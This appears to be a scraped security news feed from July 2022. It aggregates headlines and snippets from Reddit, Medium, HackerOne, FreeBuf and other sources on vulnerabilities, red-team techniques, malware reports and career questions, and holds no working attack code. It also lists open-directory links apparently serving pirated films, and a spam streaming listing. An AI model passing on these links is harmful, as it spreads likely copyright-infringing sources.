    Hey folks, I'm trying to build out my RSS feed I browse each morning when I come in. I'm looking to build out a whole section dedicated to M365 security and was wondering if folks here had any go to blogs they like, either Microsoft or third party? submitted by /u/beagle_bathouse [link] [comments]
    How to parse Linux logs to Graylog?
    Hello, We already forwarded Linux logs to our Graylog syslog server (community version). However, the logs are not parsed. One option is to use extractors, but this approach is kinda manual and time-consuming. Is there any other way to parse the Linux logs properly? Thank you. submitted by /u/sanba06c [link] [comments]
  • Open

    IOC-based threat hunting for free and without registration
    submitted by /u/Cultural_Budget6627 [link] [comments]
  • Open

    SecWiki News 2022-07-15 Review
    Offense-Defense Exercise: Domain Controller Hardening by ourren; Offense-Defense Exercise: Domain Controller Detection by ourren; Volcengine CWPP (Elkeid): Real-World Adversarial Case Sharing by ourren; Research on Software Supply Chain Security Risk Analysis by ourren. For more of the latest articles, visit SecWiki
  • Open

    Digium Phones Under Attack: Insight Into the Web Shell Implant
    We witnessed more than 500,000 unique samples of malicious traffic targeting Digium Asterisk software for VoIP phone devices. The post Digium Phones Under Attack: Insight Into the Web Shell Implant appeared first on Unit 42.
  • Open

    PortSwigginar - 13 July
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included; A recap on “what’s new” within the product for those who h
  • Open

    IW Weekly #10: 5 Articles, 4 Threads, 3 Videos, 2 Github Repos, 1 Job Alert
    No content preview
    WiFi Hacking Week Pt. 4 — Evil Twin Attacks
    No content preview
    Android WebView Hacking — Enable WebView Debugging
    No content preview
  • Open

    Implementing JARM fingerprint obfuscation and randomization
    Author: 风起. This article is a contributed submission; Seebug Paper looks forward to your contributions, and every accepted piece receives a gift! Submission email: paper@seebug.org JARM-fingerprint-based C2 identification: JARM works by actively sending 10 specially crafted TLS Client Hello packets to the target TLS server to elicit distinctive responses, capturing specific attributes of the TLS Server Hello responses, and then processing the aggregated TLS server responses in a specific way...
  • Open

    Microsoft discloses details of an Apple sandbox escape vulnerability
    Microsoft publicly disclosed technical details of an app sandbox access vulnerability in Apple systems, affecting iOS, iPadOS, macOS, tvOS and watchOS.
    Red Team Records Series (1): From Node.js code audit to internal network breakthrough
    This record stems from a red-blue confrontation exercise at the company; it began with full-port fingerprinting of the target assets via distributed scanning on an internally developed asset platform.
    Mantis: the most powerful botnet so far
    Cloudflare announced that the record-breaking DDoS attack it mitigated last month originated from a new botnet named Mantis.
    1.9 million US medical records leaked after ransomware attack
    Professional Finance Company (PFC), a US debt collection firm, reported a data breach.
    FreeBuf Morning Report | Bandai Namco confirms hacker intrusion; smart factories not prepared to respond to cyberattacks
    In June 2022, online reporting departments at all levels across China accepted 14.987 million reports, down 2.3% month-on-month and up 9.8% year-on-year.
    How to ensure files are transferred securely on an internal network? | FreeBuf Party A Group Topic Discussion
    When enterprises transfer files via USB drives, cloud drives, or within internal private networks, how can they ensure security?
    FreeBuf Weekly | Over 10,000 companies hit by phishing attacks; multiple Honda models have vulnerabilities allowing remote vehicle control
    Happy weekend, FreeBufers! We have summarized and recommended this week's hot news, quality articles and handy tools so you don't miss any of this week's highlights!
  • Open

    IDA Plugin to reconstruct .proto files used in the analyzed binary
    submitted by /u/Martypx00 [link] [comments]
    CVE-2022-29593
    submitted by /u/9lyph [link] [comments]
  • Open

    CVE-2022-29593 – Authentication Bypass by Capture Replay (Dingtian-DT-R002)
    Article URL: https://github.com/9lyph/CVE-2022-29593 Comments URL: https://news.ycombinator.com/item?id=32105629 Points: 1 # Comments: 0
  • Open

    Malicious Steganography
    How to inject malicious powershell scripts into an image? Continue reading on Medium »

  • Open

    Healthcare IT: Encrypt PHI Traffic Inside the Network?
    For those of you in healthcare IT, do you encrypt your interface transmissions inside your network? Encryption: External vs. Internal Traffic We'd all agree that unencrypted PHI can't be sent/shouldn't be sent over the internet. All external connections require a VPN or other encryption. For internal traffic, some/many organizations consider encryption as not needed. Instead, they rely on network and server protections to, "implement one or more alternative security measures to accomplish the same purpose." Without encryption, however, the internal network carries a tremendous amount of PHI as plain text. What is your organization doing vs. the below? HIPAA Encryption Requirement If an HIT org does not encrypt PHI, either in-motion or at rest, it must: Document its alternative …
    Side-hustling as VAPT freelancer, any advice? also discussion :)
    Hi everybody. I don't know if this is the right place to talk about these themes but I've seen some (really) older questions around so I think that I'll try to ask here. I'm a young computer engineer (master's) and I'm working for an IT company in the Cyber Security department; my tasks are to look after endpoint protection, firewalls, VPNs and so on. I know how to do pentests, I specialized in that in my university and I've participated in some real projects, I also aim to acquire some certifications around. Long story short, I think that I'll try in the future to side-hustle by doing penetration tests and vulnerability assessments for $$, my questions are: Have some of you done something similar? Which could be a good platform, or, what could be some good platforms to start with online? Do you have some advice in general? Do you think that there could be some other security-related side-hustles that could be better economically speaking? (I have to say that I love doing pentests). Hoping for your help, I would like to thank any one of you that will answer this post in advance :) submitted by /u/Set-New [link] [comments]
    Does SQL injection require a 'changed' scope in the CVSS score?
    I'm currently going through some vulnerabilities for an advisory and one of my coworkers said that SQL injection always has the scope set to 'changed' when calculating CVSS scores. That doesn't seem right to me since the web application is still the affected host. It also bumps up our CVSS score to look extra scary -- a 9.9 for SQLi that requires low-privileges. Example vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H If the SQL server is on the same host, shouldn't the scope remain unchanged? Thanks! submitted by /u/Reemertastic [link] [comments]
    What’s something less technical and less stressful to transition to coming from pentesting?
    Hi everyone. I’ve been doing pentesting for about 1 - 1.5 years now. I had a very high interest in pursuing a pentesting career about 2-3 years ago and I worked towards that goal by doing a lot of self learning and getting a couple certs (not OSCP, but pentest+ and eJPT). Now that I’ve been working in pentesting for a little while, I’ve realized that this isn’t for me and I want out. I find the stress that comes from performing penetration tests on a weekly basis and having to constantly battle with developers and app team owners is just too much for me. Before pentesting I worked in appsec (both static and dynamic) and before that had a very short stint as a Junior developer coming out of college. So I've been on the technical side of things pretty much my entire career. I find myself now at a place where I want to be less technical. I just want to have a stress-free job that’s consistent. Any recommendations on what else I could explore? submitted by /u/anon2user [link] [comments]
    Does configuring a specific SSID create possibilities for additional security controls?
    My team makes use of a shared office space. The owner of the space offers public WiFi without password. It's possible to have our own SSID configured on the WiFi and enforce passwords for getting access. I'm interested to learn what extra security controls we can implement if we have our own SSID. submitted by /u/But-I-Am-a-Robot [link] [comments]
    Is a DNS Query to Coin Mining Domain dangerous?
    Hello, I've received many repeated alerts from Security Onion, which stated "ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org)". The source IP address is from an internal endpoint and the destination IP address is from a DNS server. Is this event dangerous? In my opinion, it did not make any direct connection to the external IP. So, I do not see this event as a positive alert. Any advice would be highly appreciated. submitted by /u/sanba06c [link] [comments]
  • Open

    OAUTH Misconfiguration leads to Full Account Takeover
    Hello, you amazing Hackers!! My name is Aditya Singh, a Security Researcher from India. In today’s blog, we are going to see OAUTH… Continue reading on Medium »
    Basic Linux skills for bug bounty hunting and ethical hacking (day-2)
    Hello guys, it’s Selim, back here with another interesting article. In the previous article we learned about how a beginner gets into bug… Continue reading on Medium »
    Start hacking career part 3
    Today I'll share a list of bug bounty write-ups and a bug bounty checklist that I follow… Continue reading on Medium »
    Easy to find vulnerabilities that might get paid [part-2]
    Hello hackers, I am back with another short write-up. This is the second part of easy-to-find vulnerabilities that might get paid, so… Continue reading on Medium »
    How I found my first bug
    Hi guys, this is my first post in celebration of my first bug found. Continue reading on Medium »
    Abusing URL Shorteners for fun and profit
    Hello Security Researchers Continue reading on Medium »
    Recon on ASNs
    This article aims to demonstrate, in a basic way, recon on ASNs. Before we get into the subject of recon on ASNs, we need to talk about some… Continue reading on Medium »
    Beginners Guide to Bug Bounty
    This guide will give you an idea on how to start out in bug bounties if you’re new to the topic. Continue reading on Medium »
    Reset password vulnerability
    In this tutorial you will learn how you can hack any user in your vulnerable website without having their password to log in. Continue reading on Medium »

    Anyone got a practice exam for FOR508 SANS
    Hi guys, doing the 508 exam in 2 weeks and wanted to know if someone has a spare practice exam test for me - if anyone has one, would also pay for it ... PM if possible THX :) submitted by /u/schoeringhumer [link] [comments]

    OPEN SOURCE INTELLIGENCE WITH BLACKBIRD
    Information provided in this article is to assist users in scanning their own networks and systems, or networks and systems for which they… Continue reading on Medium »
    War in Ukraine / July 14
    Day 141: Tragedy in Vinnytsia — more than 20 victims Continue reading on Medium »
    The Moonshot Threat Bulletin at a Glance: June 2022
    This blog contains a short excerpt from June’s Moonshot Threat Bulletin. If you would like to access a one month free-trial to the full… Continue reading on Medium »

    Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro (Part 2)
    Hi everyone, in the previous blog post (and video) we showcased how to embed a PowerShell payload inside a VBA macro for MS Word, but we were… Continue reading on Medium »
    How Purple Teaming Made Me A Better Blue Teamer
    Purple Team experiences Continue reading on Medium »
    Hashcat 101: Cracking Password Hashes
    Let's say you are hacking a Linux box and all you have is a shadow.log like the one below Continue reading on Medium »

    SecWiki News 2022-07-14 Review
    No news updated today~ For more of the latest articles, visit SecWiki

    Understanding and Bypassing Rate Limiting
    Introduction Continue reading on InfoSec Write-ups »
    Elliptic Curve Signatures and How to Use Them in Your Java Application
    Most important properties of Elliptic Curves explained and how you can compute them in Java. Continue reading on InfoSec Write-ups »
    Let’s talk about buffer overflow
    A buffer overflow, or buffer overrun, occurs when more data is put into a fixed-length buffer than the buffer can handle. Continue reading on InfoSec Write-ups »

    BGGP3: Crash on the Cob
    submitted by /u/netsecfriends [link] [comments]
    Exploiting Arbitrary Object Instantiations in PHP without Custom Classes
    submitted by /u/albinowax [link] [comments]
    Researching access tokens for fun and knowledge
    submitted by /u/One-Assistance-8552 [link] [comments]

    A Discord server for OSINT collaboration?
    submitted by /u/OvertOperator [link] [comments]

    FreeBuf Morning Report | Uniswap loses $8 million in a phishing attack; PFC admits to a ransomware attack
    Uniswap lost $8 million in a phishing attack; PFC admitted to a ransomware attack in which the information of 1.91 million patients was leaked.
    Tophant Technology receives a letter of thanks from the China National Vulnerability Database of Information Security (CNNVD) for its "vulnerability notification" work!
    Continuously strengthening its technology and platform advantages, contributing to the improvement of the national cybersecurity vulnerability governance system and capabilities.
    Java CommonsBeanUtils1 deserialization: writing the EXP by hand
    Java CommonsBeanUtils deserialization, studied by first trying to find the vulnerability on your own rather than looking at the ysoserial gadget chain.
    Check now: new vulnerability disclosed in AMD and Intel CPUs
    Researchers at ETH Zurich discovered a vulnerability affecting many older AMD and Intel microprocessors that can lead to Spectre-based speculative execution attacks.
    New Android malware on Google Play installed 3 million times
    A new piece of Android malware appeared on the Google app store, with cumulative downloads exceeding 3 million.
    Rising rather than falling: Ukraine's cyber agency reports a surge in cyberattacks in the second quarter
    The frequency and volume of cyberattacks against Ukraine surged in the second quarter of this year.
    Botnet sample behavior analysis
    This article briefly analyzes the behavior of a botnet virus and proposes targeted countermeasures.
    New ransomware Lilith appears; companies already hit
    A new ransomware operation codenamed "Lilith" recently appeared online and has begun attacking.
    Information security officers cross swords | Review of the CSO forum at the "CIS Cybersecurity Innovation Conference, Summer Edition"
    How China's CSO system will develop in the future, what the capability evaluation criteria for CSOs are, and how specific job responsibilities have changed: the closed-door CSO forum held lively sharing and discussion on these questions.
    More than 70 Lenovo laptop models exposed to new UEFI firmware vulnerabilities
    Attacks exploiting UEFI firmware vulnerabilities are very dangerous: they can let an attacker run malware as soon as the operating system starts, even before Windows' built-in security protections are activated.
    Offense-and-defense exercise imminent, and the "important secrets" of the Box Universe have leaked!
    挖蛙 takes you to get to the bottom of it~

    Analysis of the YamaBot malware used by the Lazarus hacking group
    Author: 朝長 秀誠 (Shusei Tomonaga). Translator: Knownsec 404 Lab translation team. Original link: https://blogs.jpcert.or.jp/en/2022/07/yamabot.html JPCERT/CC is continuing to investigate Lazarus activity. In 2021, JPCERT/CC presented the group's attack campaigns at CODE BLUE and HITCON. https://github.com/JPCERTCC/Lazarus-research/ ...

    X — A Sexy Horror Story (2022) Film, Italian subtitles — CB01 Altadefinizione
    watch X — A Sexy Horror Story (2022) full movie, X — A Sexy Horror Story streaming in Italian, X — A Sexy Horror Story streaming… Continue reading on Medium »

    Cracking Kubernetes Authentication (AuthN) Model
    Part of this post’s contents first appeared in User and workload identities in Kubernetes, which was kindly edited, re-illustrated and exemplified by learnk8s.io, and very friendly to beginners. The version posted here in contrast has a biased focus on the design and implementation, as well as in-depth discussions. Related posts: Cracking Kubernetes Node Proxy (aka kube-proxy) Cracking Kubernetes Network Policy Cracking Kubernetes Authentication (AuthN) Model Cracking Kubernetes RBAC Authorization (AuthZ) Model TL; DR This post digs into the Kubernetes authentication (AuthN) model. Specifically, we’ll start from analyzing the technical requirements of AuthN in Kubernetes then design one for it (assuming it hasn’t had one yet), the final solution has an end-to-end workflow like below: Hop…

    Vulnerability to unlock and remotely start virtually all models of Honda cars
    Article URL: https://twitter.com/wugeej/status/1547043442488147969 Comments URL: https://news.ycombinator.com/item?id=32090211 Points: 2 # Comments: 0
    A macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706
    Article URL: https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/ Comments URL: https://news.ycombinator.com/item?id=32088196 Points: 8 # Comments: 0
    OpenSSL Heap Memory Corruption Vulnerability Fixed
    Article URL: https://thenewstack.io/openssl-heap-memory-corruption-vulnerability-fixed/ Comments URL: https://news.ycombinator.com/item?id=32087941 Points: 1 # Comments: 0

    Introducing Decompiler Explorer (🐶⚡️)
    submitted by /u/Psifertex [link] [comments]
    CVE-2022-29885 - Apache Tomcat Cluster Service DoS
    submitted by /u/voidz0r [link] [comments]
    Dealing with Failure: Failure Escalation Policy in CLR Hosts
    submitted by /u/jeandrew [link] [comments]
    Attacking Active Directory: 0 to 0.9
    submitted by /u/CyberMasterV [link] [comments]
    How Windows Processes Work - Creation, APIs, Data Structures (Part 1)
    submitted by /u/sciencestudent99 [link] [comments]
    This Salesforce Tableau Server XSS vulnerability will not get a CVE attributed. Here is the PoC and the fixed versions.
    submitted by /u/obilodeau [link] [comments]
    From Prototype Pollution to Remote Code Execution in Blitz.js
    submitted by /u/SonarPaul [link] [comments]
    Affinis - Subdomain Discovery Through RNN (Recurrent Neural Network)
    submitted by /u/jibblz [link] [comments]
    The Long Tail of Log4Shell Exploitation
    submitted by /u/scopedsecurity [link] [comments]
    Introducing Pretender: Your New Sidekick for Relaying Attacks
    submitted by /u/RedTeamPentesting [link] [comments]
    CVE-2022-32223 Discovery: DLL Hijacking via npm CLI
    submitted by /u/mkatch [link] [comments]
    Microsoft Teams — Cross Site Scripting (XSS) Bypass CSP ($6,000 Bug Bounty)
    submitted by /u/numanturle [link] [comments]
    Rolling PWN Attack Affecting Honda Vehicles
    submitted by /u/0xdea [link] [comments]
    Executing Arbitrary Code Over a Phone Line Thanks to the XBAND Video Game Modem
    submitted by /u/vincelasal [link] [comments]

    [Security Bulletin] Microsoft's July 2022 Patch Tuesday fixes multiple high-risk vulnerabilities
    Microsoft recently released its July 2022 security patches, fixing 84 vulnerabilities across 36 Microsoft products, including 52 privilege escalation vulnerabilities, 4 security feature bypass vulnerabilities, 12 remote code execution vulnerabilities and 11 information disclosure...

    Four more Movies/Series ODs (Lots of stuff)
    http://www.moviefyy.com/Film/ http://192.95.30.30/lol/ http://103.222.20.150/ftpdata/ http://167.114.174.132:9092/ submitted by /u/LordPato [link] [comments]
    Two Huge Movie/Series Open Directories
    http://ir2.papionvod.ir/Media/ https://dl3.3rver.org/ submitted by /u/LordPato [link] [comments]
    Photos of Idaho things: Idaho state fair, Idaho potatoes, Idaho Mormons, Idaho vacuum cleaner museum....
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

    A macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706
    Article URL: https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/ Comments URL: https://news.ycombinator.com/item?id=32088196 Points: 8 # Comments: 0
    CVE-2022-32224: Possible RCE escalation bug in SerializedColumns in ActiveRecord
    Article URL: https://discuss.rubyonrails.org/t/cve-2022-32224-possible-rce-escalation-bug-with-serialized-columns-in-active-record/81017 Comments URL: https://news.ycombinator.com/item?id=32082974 Points: 1 # Comments: 0

    Cyber Security Kill Chain : Explained
    A hacker only needs one attack vector to succeed. Your responsibility is to identify these potential attack vectors as “your security is… Continue reading on Medium »

    OTP Bypass via Response Manipulation
    Hello Readers, I am Tariq Rafiq Kehar , a bug hunter. Continue reading on Medium »
    Useful Offensive Snippets
    I will update this post regularly, I am starting with a few of my most commonly used snippets. Continue reading on Medium »
    How to study Cyber Security on your own for free?
    This was always the question in my mind from the very beginning and after studying for months and doing deep analysis and research, I came… Continue reading on Medium »
    How to find Origin IP
    Hello people!!! I'm Boopathi. In this blog, I'm going to discuss Origin IP Continue reading on Medium »
    COLIZEUM Bug-Bounty Program
    Report a bug and get Whitelisted for Colizeum ELITE NFT sale, this is an opportunity to get hands-on ELITE NFT before anybody else does. Continue reading on Medium »
    Microsoft Teams — Cross Site Scripting (XSS) Bypass CSP
    During my early stages of employment at Gais Cyber Security in 2021, my manager had reached out to me over the phone and said with… Continue reading on Medium »

    War in Ukraine / July 12
    Day 140: The question of the day: will it be possible to agree on the export of Ukrainian grain by sea Continue reading on Medium »

    SecWiki News 2022-07-13 Review
    Analysis of cloud sandbox traffic identification techniques by ourren; Implementing software composition analysis (SCA) with open-source tools by ourren; Kscan: an all-round scanner written in pure Go by ourren; Suspected PurpleFox keeps up its attack campaign with multiple techniques by ourren; Understanding C4ISR: the US is still worth learning from in informatized warfare by ourren; For more of the latest articles, visit SecWiki

    Stored XSS for Grafana dashboard URL
    GitLab disclosed a bug submitted by xanbanx: https://hackerone.com/reports/684268 - Bounty: $2500
    Undici does not use CONNECT or otherwise validate upstream HTTPS certificates when using a proxy
    Node.js disclosed a bug submitted by pimterry: https://hackerone.com/reports/1583680
    Undici ProxyAgent vulnerable to MITM
    Internet Bug Bounty disclosed a bug submitted by pimterry: https://hackerone.com/reports/1599063 - Bounty: $1000
    One Click XSS in [www.shopify.com]
    Shopify disclosed a bug submitted by comwrg: https://hackerone.com/reports/1563334 - Bounty: $500
    rubygems.org Batching attack to `confirmation_token` by bypass rate limit
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1559262 - Bounty: $480
    CVE-2021-40438 on cp-eu2.acronis.com
    Acronis disclosed a bug submitted by savik: https://hackerone.com/reports/1370731 - Bounty: $150
    [CVE-2021-44228] nps.acronis.com is vulnerable to the recent log4shell 0-day
    Acronis disclosed a bug submitted by rhinestonecowboy: https://hackerone.com/reports/1425474 - Bounty: $1000

    Affinis - Subdomain Discovery Through RNN (Recurrent Neural Network)
    submitted by /u/jibblz [link] [comments]
    Bypass Windows Defender by utilizing malicious SMB requests inside MS Word Macro
    Hope you enjoyed it, learned something new, and I would love to receive feedback. https://youtu.be/A8DkVDQW1-w submitted by /u/lsecqt [link] [comments]
    Free4All Information Technology and Cyber Security Resources
    submitted by /u/cybersocdm [link] [comments]

    Cobalt Strike Analysis and Tutorial: CS Metadata Encryption and Decryption
    We show how metadata encryption and decryption contributes to making Cobalt Strike an effective emulator that is difficult to defend against. The post Cobalt Strike Analysis and Tutorial: CS Metadata Encryption and Decryption appeared first on Unit 42.

    Why isn't there an AppArmor alternative for Windows?
    I know Windows has Mandatory Integrity Control, but it doesn't have Mandatory Access Control like Linux does with AppArmor or SELinux. It seems like AppArmor would be useful, at least for power users so my question is: Why isn't there an AppArmor (MAC) alternative for Windows? submitted by /u/greyyit [link] [comments]
    Is it me, the company or my job?
    Hello. For a long time I have worked as an ethical hacker/red teamer. A few months ago I started feeling that I do not learn anything new, I am stuck and there is no way for me to improve. When I come home, I have no energy to do some CTFs or start my own project. I just want to lie in my bed and listen to a podcast or video on a completely different topic. In this company, we do pentests of huge corporates and many times many things go wrong - the timing, the preparedness on the side of the client, the scope. All these things touch me on a very deep level; I want to deliver very professional work and do the best I can. But all of these things suck my energy. I have said many times that things need to change because otherwise we will burn out quickly, all of us. We need new stuff, something to make us inquisitive, some new challenges - not yet another scope of 1 web banking application with a limited sub-scope of 20 API calls and 1 host. But nothing changed; the people above do not listen. All they care about is the profit. We do sometimes get our hands on some nice projects, but usually these are like a firefly in the night, very very rare. I feel like I have reached my capacity in ethical hacking and would like to improve in security research and exploit development, but I do not have any mentor to follow me through. And I like the money I get now because I do my job very well and can do any task I am given. Companies I have found on the market want someone already skilled enough to just throw zero-days out of their sleeve. I want to move but have no energy to do it. Is there a problem in me? Should I change my attitude (which is already against my belief) to just do the job and then go home empty and watch other things - "it is just my job, I can do anything else in my free time"? Or is it the company that is wrong? Or is it the whole of ethical hacking or infosec in general? Is there any reasonable advice on how to actually solve this...? Thank you for reading... submitted by /u/elvisdnb [link] [comments]
    Compromised Device - Incident Process post device containment
    Hi Guys, I've got an incident where a device has been compromised. We've managed to isolate the device, take it offline and rebuild it. Using our SIEM tool, what should I be looking at to find signs of persistence, lateral movement or C2 communications? I can look up the user and get everything our SIEM logs for them, but then with all this information I can never make heads or tails of it... A lot of the stuff is probably normal traffic such as VPN connections, connecting to Microsoft etc. What can I do to filter out all of this noise and find the other stuff, or is that what it's like for everyone? Should I be looking at IoCs for that specific malware? Should I be looking at the device's activity? Do you (yes you reader) spend hours looking for persistence or do you just rebuild and move on to the next ticket? We use LogRhythm for reference so any specific tips would be great :) Please feel free to recommend books, papers, courses or videos to educate myself, and of course tips on here are super helpful. *Can't really ask someone within the team as we're a very immature team with mature tooling/services so no one really knows how to do this* submitted by /u/Maidenless4ever [link] [comments]
    Is it worth paying an extra $29/yr for Keepers BreachWatch?
    Keeper says that BreachWatch monitors the dark Web for breached accounts, but is it actually effective? If it only monitors limited databases it's not particularly useful. submitted by /u/ForComputerStuff [link] [comments]

    IW Weekly #9: Web3 Hacking, Leveraging Google Dorks, Python Flaws, and more…
    No content preview

    FreeBuf Morning Report | Biden's iCloud account allegedly hacked; WPS responds again to the deletion of users' local files
    A poster on the anonymous social media site 4chan claimed to have gotten into Hunter Biden's iCloud account and published photos and videos allegedly extracted from it.
    [Vulnerability Analysis] Drupal remote code execution (CVE-2017-6920)
    A few days ago, while taking part in the FOFA offense-and-defense challenge, I ran into a Drupal "blind box" vulnerability environment and eventually identified the vulnerability as CVE-2017-6920, but still could not get the flag, because there are not many reference articles online...
    A rookie's journey through an offense-and-defense exercise
    I recently took part in a small offense-and-defense exercise, my first time in such an event, so here is a brief record of the process.
    Hackers target the president of the European Central Bank
    Christine Lagarde, president of the European Central Bank, was the target of an attempted cyberattack.
    Hit by a massive DDoS attack, a Lithuanian energy company's operations were forced to halt
    Recently, Lithuanian energy company Ignitis Group suffered its largest cyberattack in a decade.
    Microsoft: more than 10,000 organizations hit by phishing attacks
    Microsoft says that since September 2021, more than ten thousand organizations have been targeted by phishing attacks.
    Insight into zero trust: review of the Zero Trust Security Forum at the CIS Cybersecurity Innovation Conference, Summer Edition
    Through content-rich talks, the experts of the Zero Trust Security Forum sketched a full picture of today's zero trust deployment schemes and the trajectory of future development.

    Pocsuite3 beginner's tutorial
    Author: Knownsec 404 Lab. Date: July 13, 2022. 1 Introduction. Pocsuite3 is an open-source remote vulnerability testing framework under the GPLv2 license built by Knownsec 404 Lab; since it was open-sourced in 2015, the Knownsec security research team has maintained it continuously, with ongoing updates and iterations. Some features: supports three modes, verify, attack and shell; not only built for scanning, it can also be used in other scenarios, such as vulnerability exploitation and obtaining an interactive ... on the target
    Exploring WAF bypasses for Java file uploads at the traffic level
    Author: Y4tacker. This article is a reader contribution; Seebug Paper looks forward to your submissions, and every accepted piece receives a gift! Submission email: paper@seebug.org. Foreword: I happened to see ch1ng's article and found it very interesting, and I have to admire how skilled the author is, but looking at that long function I kept feeling there must be something slicker, and fortunately there really was; I am taking this opportunity to publish it and get to the bottom of it, and I also have to marvel at the ingenuity of the RFC documents. Of course, the techniques in this article are limited to bypassing WAFs at the traffic level...

    Career question about private sector
    Hi, interested in computer forensics, but it seems to be dominated by LE. Nothing against LE, but I would like to enter a career where I wouldn't necessarily HAVE to go through LE. So can anyone advise on what some of the private sector roles and career paths in the computer forensics field are? I wouldn't mind being some sort of digital private investigator but would like to know how realistic that would be. TIA! submitted by /u/zrobb999 [link] [comments]
    What data can I pull from Echo Dot & how long before it’s overwritten by new data?
    Context: my best friend died recently and I just realized that there are a few echo dots at his house. When I told his family that it may be possible to pull audio from the echo dots, so as to provide some insight into what was happening before he died, they were very interested. I am fairly tech savvy but only have dabbled in computer forensics at a hobbyist/total novice level. That being said, is it feasible for me to attempt to grab data from my late friend’s echo dots? What’s the process? What should I be wary of, what kinds of credentials do I need etc? Thanks so much in advance. Hope my question made sense; I’m still pretty foggy mentally as I process my friend’s untimely death :( submitted by /u/feelin_weird [link] [comments]
    Volatility Help - pagefile & hiberfil
    Hi all. I've been poking around trying to analyze a pagefile and hiberfil I recovered, but for the life of me, I can't get volatility to play nice with me. So for starters, I've confirmed via the registry that the processor is AMD64 architecture and that it's Windows 10 19041.1.vb_release.191206-1406. I've tried using volatility to convert to a raw image (vol -f file.sys imagecopy -O target.raw) and no matter what profile I apply - which, ostensibly should be Win10x64_19041 - no plugins will take against it. Not in Volatility 2.6, 3.1, or 3.2. In the latter two, imagecopy is not an available plugin. I am not sure what I am doing wrong, if I am missing plugins, or what have you, but I would appreciate any guidance. I would buy Arsenal Recon's tools, but that isn't currently an option. submitted by /u/KillithidMindslayer [link] [comments]

    Can you get malware just from entering a website?
    Not really sure if this subreddit is the right place to ask, so if it's not, please excuse me. So long story short, I googled "youtube" and clicked a little too fast on the top result, which seemed like the official YouTube link. For those asking, the link I clicked had "ad" mentioned above it, so it was the top result and the actual official YouTube link came right under it. After clicking on the top link, a weird website opened that was definitely not YouTube. It clearly looked like something to scare people (e.g., your OS is infected or call this number for help in bold red letters). I'd like to know how likely it is that some malware is now on my computer as a result of this? Is it possible to get any virus only from entering a website? I didn't click on anything after entering this website, I only took a screenshot (if people want to see it) and closed everything. Thank you! submitted by /u/TangerineNo6098 [link] [comments]
    How well does CRTP teach you about pivoting and windows privilege escalation?
    In preparation for the OSCP I thought about taking the CRTP. I read that it teaches you pivoting and Windows escalation, but how well though? Like OSCP-level well? Will I need other training besides it? submitted by /u/watermelonSoundsNice [link] [comments]
    Need some advice on certifications paths to take
    I've got like $700-800 to spend and don't know which path I should take for the best looking resume. I failed my OSCP exam and a retake costs $250. I'm very bad at AD and Windows priv escalation, so I thought about taking CRTP (the cert costs $250, and the videos and lab alone cost $70). Having taken the OSCP exam before, I can say the exam is horrible and I may fail again even with CRTP, so I'm thinking about potentially taking PNPT ($300) or eCPPT ($400). I have a few routes to take: I could take the CRTP cert to have a good looking cert on the resume (don't know exactly how recruiters will look at it), or I could just take the training alone for $70 and save for another potential OSCP retake, or maybe PNPT/eCPPT if things don't work out with the OSCP. Kinda lost with this. Will I miss out if I take the CRTP training alone without the cert? Help. submitted by /u/watermelonSoundsNice [link] [comments]
    Assessing cyber resilience
    Hi all! I've got a question about assessing the cyber resilience of an organization. Is there a standard to assess cyber resilience? Are there frameworks described? Are there good books or articles about cyber resilience? Thanks in advance! submitted by /u/overigegebruiker12 [link] [comments]

    Retbleed: Arbitrary Speculative Code Execution with Return Instructions
    submitted by /u/mstromich [link] [comments]
    How to secure Kubernetes deployment with signature verification – Cosign and Connaisseur
    submitted by /u/MiguelHzBz [link] [comments]
    Microsoft Azure Site Recovery DLL Hijacking ($10,000 Bug Bounty)
    submitted by /u/dinobyt3s [link] [comments]
    From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud
    submitted by /u/SCI_Rusher [link] [comments]
    Exploratory analysis of CVEs - Some interesting viz
    submitted by /u/10xpdev [link] [comments]
    Exploiting Authentication in AWS IAM Authenticator for Kubernetes
    submitted by /u/albinowax [link] [comments]

    Rails Security Release CVE-2022-32224
    Article URL: https://rubyonrails.org/2022/7/12/Rails-Versions-7-0-3-1-6-1-6-1-6-0-5-1-and-5-2-8-1-have-been-released Comments URL: https://news.ycombinator.com/item?id=32075137 Points: 3 # Comments: 0

    Web vulnerability discovery and exploitation
    Note: this article is for reference and study only; the laws of every country expressly prohibit illegal hacking attacks, and you bear the consequences yourself!
    FreeBuf Morning Report | US announces latest "quantum-resistant algorithms"; EDF to undergo cybersecurity record review
    The US National Institute of Standards and Technology (NIST) has formally selected four encryption algorithms that can withstand attacks by quantum computers, to guard against future cyberattacks.
    Attackers use a fake job offer to steal $540 million from Axie Infinity
    Attackers sent a senior Axie Infinity engineer a fake job offer via LinkedIn and stole $540 million from the company.
    GitHub Actions and Azure virtual machines are being used for cloud crypto mining
    According to The Hacker News, GitHub Actions and Azure virtual machines (VMs) are being used for cloud-based cryptocurrency mining. This means the mining black and gray market has begun turning its attention to cloud resources.
    Beware of Google updates: they may be ransomware in disguise
    A new ransomware is appearing online in the guise of a Google update, using Windows system features to carry out extortion attacks.
    Over the next five years, losses from online payment fraud will reach $343 billion
    Over the next five years, total global losses from online payment fraud will exceed $343 billion.
    Promoting security through offense and defense | Review of the offense-and-defense forum at the "CIS Cybersecurity Innovation Conference, Summer Edition"
    As one of the three major forums of the CIS Cybersecurity Innovation Conference Summer Edition, the live-network confrontation and offense-and-defense exercise session brought together many experts and leading figures to discuss new developments in enterprise security from an offensive and defensive perspective.

    War in Ukraine / July 11
    Day 139: Ukraine’s economic problems Continue reading on Medium »
    No Future for the North Korea Fixer
    An indictment by US authorities against two crypto diplomats, now added to the US Most-Wanted list, sparked an #OSINT investigation Continue reading on Medium »
    Google Hacking
    What is a Google Dork? Continue reading on Medium »

